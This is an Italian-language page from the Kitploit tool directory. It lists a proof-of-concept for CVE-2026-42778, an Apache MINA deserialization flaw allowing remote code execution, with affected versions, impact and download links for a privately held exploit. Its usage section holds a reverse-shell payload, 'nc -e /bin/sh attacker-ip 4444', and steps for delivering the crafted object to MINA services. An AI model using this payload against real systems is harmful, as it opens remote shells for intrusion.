Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42778-POC — CVE-2026-42778 EUVD-2026-26492 Deserializzazione di dati non attendibili (CWE-502) | Kitploit
Strumenti/GitHubGitHub/akinfue/cve-2026-42778-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSviluppo PayloadBinary Exploitation
GitHubakinfue/cve-2026-42778-poc

CVE-2026-42778-POC

CVE-2026-42778 EUVD-2026-26492 Deserializzazione di dati non attendibili (CWE-502)

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-42778

Panoramica

Fix incompleto nel metodo AbstractIoBuffer.getObject() di Apache MINA. La validazione della allowlist dei nomi delle classi, che limita quali classi possono essere deserializzate, viene applicata troppo tardi, dopo che gli inizializzatori statici nelle classi in lettura potrebbero essere già stati eseguiti. Ciò accade perché il fix originale per CVE-2024-52046 non è stato applicato correttamente ai rami 2.1.X e 2.2.X. Versioni interessate: - Apache MINA 2.1.0 fino a 2.1.11 - Apache MINA 2.2.0 fino a 2.2.6

Exploit:

Scarica qui

Dettagli

  • ID CVE: CVE-2026-42778

  • Pubblicato: 05/01/2026

  • Impatto: Critico

  • Disponibilità dell'exploit: Non pubblico, solo privato.

  • CVSS: 9.8

  • Patch disponibile: (Nessuna patch ufficiale ancora)

Impatto

Un attaccante può creare oggetti serializzati malevoli che, quando elaborati da IoBuffer.getObject(), eseguono codice arbitrario tramite inizializzatori statici prima che avvenga la validazione della allowlist dei nomi delle classi. Poiché si tratta di una vulnerabilità accessibile in rete che non richiede privilegi o interazione con l'utente, è possibile l'esecuzione remota di codice per qualsiasi applicazione che utilizza Apache MINA e che chiama il metodo IoBuffer.getObject(). La vulnerabilità consente il completo compromesso di riservatezza, integrità e disponibilità dei sistemi interessati.

Versioni interessate

  • Apache MINA 2.1.0 fino a 2.1.11
  • Apache MINA 2.2.0 fino a 2.2.6

Utilizzo

root@kitploit:~
# Compila e genera
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"

# Invia sulla rete al servizio basato su MINA utilizzando ObjectSerializationCodecFactory
# o a qualsiasi endpoint che chiama IoBuffer.getObject()

Contatti

  • Per richieste, contattare:[email protected]
  • Exploit : qui
Scarica lo strumento